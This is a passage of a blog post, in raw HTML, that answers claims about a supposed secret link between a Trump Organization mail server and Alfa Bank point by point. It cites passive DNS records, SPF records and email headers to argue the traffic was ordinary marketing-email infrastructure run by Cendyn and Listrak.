<li style="text-align: left;">A long list of subdomains of CONTACT-CLIENT.COM shows other clients on Cendyn with similar domains. (see <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpiu0wgDwI-BTznTDwZVDHOfARTJwGRSlOYb3IXTvHsI7WK8-rrXUw3Th-4-dKCNbberZWnAkg1vTumhY7_JetsLLiOerZ5xJGvjdvRDBngRQLdm_EsUxQXV5avZClPyVsKp0kdHyiSYm/s1600/screenshot-1763.png">Virustotal pDNS Contact-client.com subdomains</a>)</li>
</ul>
<ul>
<li style="text-align: left;">"The RData for this host were served by the Central Dynamics (CC-801) authority resolvers ns{1,2,3}.cdcservices.com."(src. <a href="https://gdd53.wordpress.com/">GDD</a>) < Central Dynamics (Cendyn) maintained DNS records for the domain just like they do for other customers and other domains they registered and maintained for Trump were: </li>
</ul>
</blockquote>
<blockquote class="tr_bq" style="text-align: left;">
<blockquote class="tr_bq">
<ul style="text-align: left;">
<li style="text-align: left;">TRUMP1.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/66.216.133.29">66.216.133.29</a> (Cendyn's range)</li>
</ul>
<ul style="text-align: left;">
<li>TRUMP.MLINKS.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/168.235.224.14">168.235.224.14 </a>(Cendyn's range)</li>
</ul>
<ul style="text-align: left;">
<li>TRUMP.TRANSACTIONAL.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/64.135.26.234">64.135.26.234</a> (Cendyn's range)</li>
</ul>
<ul style="text-align: left;">
<li>TRUMP.MARKETING.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/64.135.26.234">64.135.26.234</a> (Cendyn's range)</li>
</ul>
</blockquote>
</blockquote>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<ul>
<li style="text-align: left;">MAIL1.TRUMP-EMAIL.COM <a href="http://whatismyipaddress.com/ip/66.216.133.29">66.216.133.29</a> (now is on 184.168.221.46 - GoDaddy dn parking) </li>
</ul>
<ul>
<li>LINKS.TRUMP-EMAIL.COM CNAME customers.listrak.com (now is on 184.168.221.46 - GoDaddy domain parking)</li>
</ul>
</blockquote>
</blockquote>
<ul><ul></ul>
</ul>
<br class="Apple-interchange-newline" />
<hr />
<span style="color: #ffd966;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><span style="color: #ffd966;"><b><span style="color: #9fc5e8;">Claim 3:</span></b> </span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>"Trump’s host mail1.trump-email.com operated a Listrak virtual mail transfer agent outside the SPF sending range, configured for outbound delivery. "<span style="font-family: "georgia" , "times new roman" , serif;">(src. <a href="https://gdd53.wordpress.com/">GDD</a> and <a href="http://www.slate.com/articles/news_and_politics/politics/2016/11/the_trump_server_evaluating_new_evidence_and_countertheories.html">Slate</a>)</span></i></span><br />
<div>
<span style="font-family: "georgia" , "times new roman" , serif;"><i><span style="font-family: "georgia" , "times new roman" , serif;"><br /></span></i></span>
<span style="font-family: "georgia" , "times new roman" , serif;"><i><span style="font-family: "georgia" , "times new roman" , serif;">"The scientists theorized that the Trump and Alfa Bank servers had a secretive relationship after testing the behavior of mail1.trump-email.com using sites like Pingability. When they attempted to ping the site, they received the message “521 lvpmta14.lstrk.net does not accept mail from you.” </span></i></span> (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</div>
<div>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 3:</b></blockquote>
</blockquote>
<blockquote class="tr_bq">
<ul>
<li>Robert Graham from Errata Security already explained that this is how Listrak configures email marketing servers. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMtsEBIrKuW">Errata Security</a>). </li>
</ul>
</blockquote>
<blockquote class="tr_bq">
<ul>
<li>As for "outside of SPF range", Cendyn's SPF records for TRUMP-EMAIL.COM and CONTACT-CLIENT.COM (envelope sender) included <b><u><span style="color: cyan;">MX</span></u></b>, which is the same for all their domains - <i>incoming.cdcservices.com</i> . MX entry in SPF records makes it unnecessary to list all the IPs. The only downside and limitation about using MX entry instead of IPs is that it works only for servers that only do sending, not receiving - which is what that server was built to do. See the <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6xFZR0UxoxeRZOIA5yFOZwPwgXEODCpJ1nXZ2XS45ynR0Al5QJbumol5-hhoZi5zED5NCaQOHe0968Gsm4-I9XzcArT5lPAGb9-RPVA-1cFv-eWl2RRZeniMrjv1NAj2lv-EWq-7lrPig/s1600/header.png">header </a>here and note that <span style="font-family: "menlo"; font-size: 11px;">Received-SPF: pass</span></li>
</ul>
</blockquote>
<blockquote class="tr_bq">
<span style="color: #fff2cc; font-family: "menlo";"><span style="font-size: 11px;"><b>SPF records for TRUMP-EMAIL.COM: </b></span></span><span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "menlo";"><span style="font-size: 11px;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-14 11:17:46 -0000</span></span><span style="font-family: "menlo";"><span style="font-size: 11px;">last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2016-09-23 12:59:33 -0000</span></span><span style="font-family: "menlo";"><span style="font-size: 11px;">trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>TXT<span class="Apple-tab-span" style="white-space: pre;"> </span>"Internet Solution from Cendyn.com." </span></span><span style="font-family: "menlo";"><span style="font-size: 11px;"><br /></span></span><span style="font-family: "menlo"; font-size: 11px;">trump-email.com.</span><span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-family: "menlo"; font-size: 11px;">TXT</span><span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-family: "menlo"; font-size: 11px;">"v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 <u><span style="color: #f4cccc;">mx</span></u> ~all"</span></span><br />
<span style="color: #fff2cc;">SPF check from email header:</span><span style="font-family: "courier new" , "courier" , monospace;"><b>Received-SPF: pass </b>(google.com: domain of H46ERELB4L1O917PENAM0QLOBKO2PO7OTETRAA30GQDB7GOSSGRVKCR5AKPE3C9@b.contact-client.com designates 66.216.133.29 as permitted sender) client-ip=66.216.133.29;</span></blockquote>
<br />
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 4:</span></b><span style="color: #f1c232; font-family: "trebuchet ms" , sans-serif; font-weight: bold;"> </span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>"Since May of 2016 only two networks resolved the mail1.trump-email.com host, AS15632 (JSC Alfa-Bank) and AS30710 (Spectrum Health). Alfa Bank is Russia’s largest bank and Spectrum Health is a integrated, managed care health care organization in Michigan."(src. </i></span><i style="font-family: Georgia, "Times New Roman", serif;"><span style="font-family: "georgia" , "times new roman" , serif;"><a href="https://gdd53.wordpress.com/">GDD</a></span></i><span style="font-family: "georgia" , "times new roman" , serif;"><i>)</i></span><br />
<blockquote class="tr_bq">
<span style="color: #9fc5e8; font-family: inherit;"><b><span style="font-family: "trebuchet ms" , sans-serif;">Response 4:</span><span style="font-family: inherit;"> </span></b></span></blockquote>
<blockquote class="tr_bq">
The logs show more than two companies (src. <a href="http://ljean.com/NetworkRecords/DNS-Lookups-For-mail1.trump-email.com-Through-9-14.txt">LJean.com</a>)</blockquote>
<blockquote class="tr_bq">
Other companies that are not shown in the logs also made such queries (src. <a href="https://twitter.com/russellbrandom/status/793289191555825664">Twitter</a> - via Errata Security) </blockquote>
<blockquote class="tr_bq">
Robert Graham has covered that topic. (src.<a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WM7vbBIrLKi"> Errata Security</a>) </blockquote>
<hr />
<span style="color: #9fc5e8;"><span style="font-weight: bold;"><b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 5:</span></b> </span></span><br />
<span style="color: #9fc5e8;"><span style="font-weight: bold;"> </span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>Spikes in the communications correlate with the political events in the Summer of 2016 .(src. </i></span><i style="font-family: Georgia, "Times New Roman", serif;"><span style="font-family: "georgia" , "times new roman" , serif;"><a href="https://gdd53.wordpress.com/">GDD</a></span></i><span style="font-family: "georgia" , "times new roman" , serif;"><i>)</i></span><br />
<blockquote class="tr_bq">
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Response 5: </b></span></blockquote>
<blockquote class="tr_bq">
Some spikes correlate and others don't.</blockquote>
<blockquote class="tr_bq">
Robert Graham has covered that topic. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMWiGhIrLKh">Errata Security</a>)</blockquote>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 6</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;">: </span><br />
<div>
<span style="font-family: "georgia" , "times new roman" , serif;"><i>"Strange combined domain name (mail.trump-email.com.moscow.alfaintra.net) seen in Alfa Bank logs mean "Moscow division of the INTERNAL Alfa Bank network most definitely has purposeful communications with a hostname registered by the Trump Organization. "(src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</i></span><br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 6:</b></blockquote>
<blockquote class="tr_bq">
It is normal Windows behavior. Look for Primary DNS and DNS suffix topics. Robert Graham already covered it. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMWiGhIrLKh">Errata Security</a>)</blockquote>
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 7:</span></b><span style="color: #f1c232; font-weight: bold;"> </span><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHGHBHb54yqJqHFR5o8a8S4bbm1ey91SwIZ_4ZHIfnuHYSlzNM_2Sy2kXTrwVAs9gnc7goYnaTGGAcn9G-aqvStqf_fCWWo5JfdzfT9x_1BSZo21Wwa55iPgirvKb4RvwNY-ai43X-F1r/s1600/cendyn-headquarters.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHGHBHb54yqJqHFR5o8a8S4bbm1ey91SwIZ_4ZHIfnuHYSlzNM_2Sy2kXTrwVAs9gnc7goYnaTGGAcn9G-aqvStqf_fCWWo5JfdzfT9x_1BSZo21Wwa55iPgirvKb4RvwNY-ai43X-F1r/s200/cendyn-headquarters.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Cendyn headquarters</td></tr>
</tbody></table>
<span style="font-family: "georgia" , "times new roman" , serif;"><i>IP address 66.216.133.29 doesn't appear on spam blocklists thus unlikely to be a spam server (src. </i></span><i style="font-family: Georgia, "Times New Roman", serif;"><a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a></i><span style="font-family: "georgia" , "times new roman" , serif;"><i>)</i></span><br />
<i style="font-family: Georgia, "Times New Roman", serif;"></i><br />
<i style="font-family: Georgia, "Times New Roman", serif;"></i>
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 7:</b></blockquote>
<blockquote class="tr_bq">
<a href="http://www.cendyn.com/">Cendyn</a> is a marketing company, they do their best to avoid being blacklisted as it would undermine their business.</blockquote>
<blockquote class="tr_bq">
Robert Graham already covered it. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMWiGhIrLKh">Errata Security</a>) </blockquote>
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 8:</span></b><span style="color: #f1c232; font-weight: bold;"> </span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>CenDyn stated the reason they recreated a trump1.contact-client.com hostname pointing to this same IP address was for the Trump Organization to use the CRM software CenDyn provides to the Trump Organization." (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</i></span><br />
<blockquote class="tr_bq">
<span style="color: #f1c232; font-family: inherit;"><b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 8:</b><b> </b></span></blockquote>
<blockquote class="tr_bq">
It is possible they needed to use TRUMP1.CONTACT-CLIENT.COM after they removed EMAIL1.TRUMP-EMAIL.COM We do not know when it happened. We know when TRUMP1.CONTACT-CLIENT.COM showed up in the DNS logs and passive DNS database, but it is not a direct evidence of the creation and assignment date. </blockquote>
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 9:</span></b><span style="color: #f1c232; font-weight: bold;"> </span><br />
<span style="color: #f1c232;"><span style="font-family: "georgia" , "times new roman" , serif; font-weight: bold;"><i></i></span></span><i><span style="font-family: "georgia" , "times new roman" , serif;">"CenDyn states that their servers are not dedicated to a specific client. Yet the Internet-Wide Scan Data Repository (scans.io) data show that the hostname mail1.Trump-Email.com has been stable since at least 2013. It did not change for three years, then did change on on 23 September 2016. At the time of this writing, 2 October 2016, no other hostname has pointed to this IP 66.216.133.29:just trump1.contact-client.com and mail1.trump-email.com. So this IP address is associated with only that server. " (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</span></i><br />
<span style="color: #bf9000; font-weight: bold;"><br /></span>
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 9:</b></blockquote>
<blockquote class="tr_bq">
This is correct. It appears that 66.216.133.29 was dedicated to Trump Organization. PTR records are still not updated.</blockquote>
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2010-07-02 19:20:22 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2016-09-13 01:47:56 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mail1.trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>66.216.133.29 </span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2017-03-08 04:32:26 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2017-03-19 17:41:34 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mail1.trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>184.168.221.46 < now</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: "times" , "times new roman" , serif;">Reverse DNS</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">Rdata results for ANY/ 66.216.133.29</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mail1.trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>66.216.133.29</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">trump1.contact-client.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>66.216.133.29</span></blockquote>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;"><b>Claim 10</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;">:</span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>DNS was possibly used to conceal data and commands within DNS traffic using the technique called DNS tunneling (<a href="https://twitter.com/search?q=trump%20dns%20tunneling&src=typd">as many ask on Twitter</a>)</i></span></div>
</div>
</div>
<div>
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 10:</b></blockquote>
<blockquote class="tr_bq">
It does not seem to be the case, if based on the provided logs. They show "A" records only. "A" records are used for transferring only IP addresses. DNS tunneling would be possible if those were "TXT" or "CNAME" type records that can hold arbitrary non-formatted text strings. (<a href="https://zeltser.com/c2-dns-tunneling/">Tunneling Data and Commands Over DNS to Bypass Firewalls</a> by Lenny Zeltser)</blockquote>
<hr />
<h3 style="text-align: left;">
<i style="color: #ffd966;"><span style="color: #9fc5e8;">September 21, 2016 - October 5, 2016 As requests for comments were sent to Alfa Bank</span></i></h3>
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 11:</b></span></span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>"</i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>When a reporter called Alfa Bank for comment on September 21, the zone for mail1.trump-email.com was removed from ns1 and ns3.cdcservices.com causing RCODE=2 (Server Failure), and ns2 returned empty </i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>referrals</i></span><i style="color: #281b21; font-family: georgia, "times new roman", serif;">"</i><i><span style="font-family: "georgia" , "times new roman" , serif;">(src. <a href="https://gdd53.wordpress.com/">GDD</a>)</span></i><span style="font-family: "georgia" , "times new roman" , serif;"><i><br /> </i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i> "One of the intriguing facts in my original piece was that the Trump server was shut down on Sept. 23, two days after the New York Times made inquiries to Alfa Bank (and a week before the Times reached out to Trump)." (src. <a href="http://www.slate.com/articles/news_and_politics/politics/2016/11/the_trump_server_evaluating_new_evidence_and_countertheories.html">Slate</a>)</i></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i><br /></i></span>
<span style="font-family: "georgia" , "times new roman" , serif;"><i>Trump, CenDyn or some other party associated with the domain sought to erase the mail1.Trump-Emal.com host by deleting forward resolution zones. So the domain name was removed from the normal way one would look up a domain. However, the reverse delegation still exists as of 2 November 2016." (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</i></span></div>
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 11:</b></blockquote>
<blockquote class="tr_bq" style="text-align: left;">
The server as machine on 66.216.133.29 in the Listrak datacenter is still up so it was not shut down.<br />
Passive DNS shows that "A" record MAIL1.TRUMP-EMAIL.COM was last seen on 66.216.133.29 on 2016-09-13. Since Trump company 'ditched' Cendyn in March 2016, eventual cleanup of DNS records had to happen - eventually. We don't know if they were contacted regarding the matter on or before September 22, 2016. If they were, it would be a normal knee-jerk reaction to the inquiry.<br />
They removed records only from the Ft. Lauderdale servers (NS1 and NS3) but not NS2 in Boca Raton (different admins?). It was noted by many that they also forgot to remove PTR record for mail1.trump-email.com and it is still pointing to 66.216.133.29 even though A record was finally assigned to GoDaddy domain parking 184.168.221.22 on March 8, 2017 (after transferring domain back to Trump org). </blockquote>
<div style="text-align: left;">
</div>
<hr />
<br />
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 12</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>"</i></span><i><span style="font-family: "georgia" , "times new roman" , serif;"><span style="font-family: "georgia" , "times new roman" , serif;">Alfa Bank knew that Trump renamed his host through ongoing email delivery and HELO/EHLO resolutions, or another channel. Trump and Alfa Bank have since coordinated their move to an office communications channel." (src. </span><span style="font-family: "georgia" , "times new roman" , serif;"> </span><a href="https://gdd53.wordpress.com/" style="font-family: georgia, "times new roman", serif;">GDD</a><span style="font-family: "georgia" , "times new roman" , serif;">)</span></span></i><br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 12:</b></blockquote>
<blockquote class="tr_bq">
Not sure what the author means by "an office communications channel". The requests for comments for the Alfa Bank were made on September 21, 2016. On September 27, 2016 the Alfa bank DNS server made a lookup for TRUMP1.CONTACT-CLIENT.COM. Considering that they did their investigation of the claims, it is not unexpected that their security people finally found and queried the other domain associated with the IP.</blockquote>
<hr />
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 13</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>"</i></span><i><span style="font-family: "georgia" , "times new roman" , serif;"><span style="font-family: "georgia" , "times new roman" , serif;">The hostname trump1.contact-client.com appeared in the first passive DNS</span></span></i><br />
<i><span style="font-family: "georgia" , "times new roman" , serif;"><span style="font-family: "georgia" , "times new roman" , serif;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0v-BQwrowRccxOoBD2z7wxkS_xT_TOGCSMVkresjMXeYZsKFHetccXHh9e8Fiq1beAqBapgapaB02cDKdKctNY5lGMXtf34CTfNFCHZC32CTE8OiIeMHvGXbxaBGNfPbQmkAA5LoV0iMj/s1600/screenshot-1794.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0v-BQwrowRccxOoBD2z7wxkS_xT_TOGCSMVkresjMXeYZsKFHetccXHh9e8Fiq1beAqBapgapaB02cDKdKctNY5lGMXtf34CTfNFCHZC32CTE8OiIeMHvGXbxaBGNfPbQmkAA5LoV0iMj/s200/screenshot-1794.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Over 500 subdomains. <br />
via PassiveTotal pDNS</td></tr>
</tbody></table>
database three days later, and still has not appeared in some passive collections." (src. </span><span style="font-family: "georgia" , "times new roman" , serif;"> </span><a href="https://gdd53.wordpress.com/" style="font-family: georgia, "times new roman", serif;">GDD</a><span style="font-family: "georgia" , "times new roman" , serif;">)</span></span></i><br />
<i><span style="font-family: "georgia" , "times new roman" , serif;"><br /></span></i>
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 13:</b></blockquote>
<blockquote class="tr_bq">
Passive DNS collections are passive. They see a lot but not every successful resolution on the web. (see more at <a href="https://help.passivetotal.org/passive_dns.html">PassiveTotal FAQ</a> or <a href="https://www.farsightsecurity.com/technical/passive-dns/passive-dns-faq/#q11">Farsight pDNS FAQ</a> )</blockquote>
<hr />
<h3 style="text-align: left;">
<i><span style="color: #9fc5e8;">October 5, 2016 - March 8, 2017 Post-Disclosure</span></i></h3>
<span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 14</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span><span style="color: #f1c232;"><span style="color: #f1c232; font-weight: bold;"> </span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>In March 2016, Cendyn said it "transferred back to" Trump's company the mail1.trump-email.com domain. (Src. <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">CNN</a>)</i></span><br />
<div>
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 14:</b></blockquote>
<blockquote class="tr_bq">
Yes, they did transfer the domain control on 2017-03-08. Since then, MAIL1.TRUMP-EMAIL.COM and all subdomains resolve to 184.168.221.46 - GoDaddy Parking (IP address for domains without associated hosting servers) </blockquote>
<div>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><span style="color: #f1c232; font-family: "times";"><span style="color: #f1c232; font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 15</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;">:</span> </span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>Alfa Bank claims that the recent attacks in February and March 2017 are intended to make it look they continue the secret communications with the Trump server.</i></span><br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 15:</b></blockquote>
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"></span><br />
<blockquote class="tr_bq" style="text-align: left;">
<span style="color: #d5a6bd; font-family: "georgia" , "times new roman" , serif;"><i><b>2017-02-17 </b></i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>According to the Alfa Bank press release on 2017-03-17, on 2017-02-17 computers in USA sent requests to "Trump Organization server" and made it look like it came "from various variants of MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. </i><a href="https://alfabank.ru/press/news/2017/3/17/38162.html" style="font-style: italic;">Alfa Bank</a><i> and </i><a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax" style="font-style: italic;">Circa</a><i>).</i></span></blockquote>
<blockquote class="tr_bq">
The press releases often go through several layers of editing which could affect the technical accuracy of the text. For example, here we can assume that by the Trump Organization server they mean Cendyn's DNS server for MAIL1.TRUMP-EMAIL.COM and that server received DNS queries for MAIL1.TRUMP-EMAIL.COM that came from Alfa Bank spoofed IP addresses. DNS servers do not record domain names of incoming requestors, so it is not entirely clear where they saw <span style="font-family: "georgia" , "times new roman" , serif;"><i>MOSCow.ALFAintRa.nET. </i>Not questioning the fact of the attack but it is hard to say what happened without actual logs or more technical data.</span></blockquote>
<blockquote class="tr_bq">
<span style="color: #d5a6bd; font-family: "georgia" , "times new roman" , serif;"><i>2017-03-11 and 2017-03-13 </i></span><i><span style="font-family: "georgia" , "times new roman" , serif;">According to the Alfa Bank press release on 2017-03-17, on 2017-03-11 and 2017-03-13 their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. <a href="https://alfabank.ru/press/news/2017/3/17/38162.html">Alfa Bank</a> and <a href="http://circa.com/politics/alfa-bank-in-russia-said-donald-trump-computer-connections-may-have-been-hacker-hoax">Circa</a>)</span></i></blockquote>
<blockquote class="tr_bq">
Again, it looks like press release is lacking technical accuracy, which is ok.<br />
In general, sending DNS request from spoofed IP addresses (crafted packets) is very easy. Often attackers use nonexistent subdomains to force their recursive DNS server to forward each of their queries to the authoritative DNS server for that domain instead of using cached answers, thus overloading it. DDoS does not seem to be the goal but more like malicious experimenting. </blockquote>
<div>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 16</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;">:</span></div>
</div>
But experts claim it is <unusual, odd.. etc><br />
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 16: </b></blockquote>
<blockquote class="tr_bq">
In tech speak, epithets like "odd", "weird", "not normal" do not really mean clandestine or paranormal. These are highly technical terms meant to convey that existing evidence is too limited to allow one extrapolate the possible scenarios. I am not speaking for every comment out there but am suggesting not to jump to conclusions when a nerd calls something "odd". <br />
Robert Graham comments on the experts' claims too (src. <a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WMeGlxIrLKi">Errata Security</a>)</blockquote>
</div>
<div>
<h3 style="clear: both; color: black; text-align: left;">
</h3>
</div>
<h2 style="text-align: left;">
<span style="color: #f1c232;">Timeline of events 2007 - 2017</span></h2>
It would be beneficial, I think, to establish a timeline of the events that you see below and we will go over the milestones below.<br />
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDS1RlMAMJ2MoYFAPjqpZZk3MvdsDLZPT2F0d5ryW9lT-KUKu2Gjr0UbIAMzr9kTpeCRpkDjzkpU-QWy_iAP1OtxjxDv40p2a7cLXwmZpLPwscZRL7KVrmcBfIS20iMNkLLHvhyphenhyphenpgxj8_o/s1600/screenshot-1763.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDS1RlMAMJ2MoYFAPjqpZZk3MvdsDLZPT2F0d5ryW9lT-KUKu2Gjr0UbIAMzr9kTpeCRpkDjzkpU-QWy_iAP1OtxjxDv40p2a7cLXwmZpLPwscZRL7KVrmcBfIS20iMNkLLHvhyphenhyphenpgxj8_o/s1600/screenshot-1763.png" /></span></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;"><span style="font-family: inherit; font-size: small;">Timeline of events February 2016 - March 2017</span></td></tr>
</tbody></table>
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><br /></span></div>
<b><span style="font-family: inherit;">References for the timeline</span></b><br />
<ul style="text-align: left;">
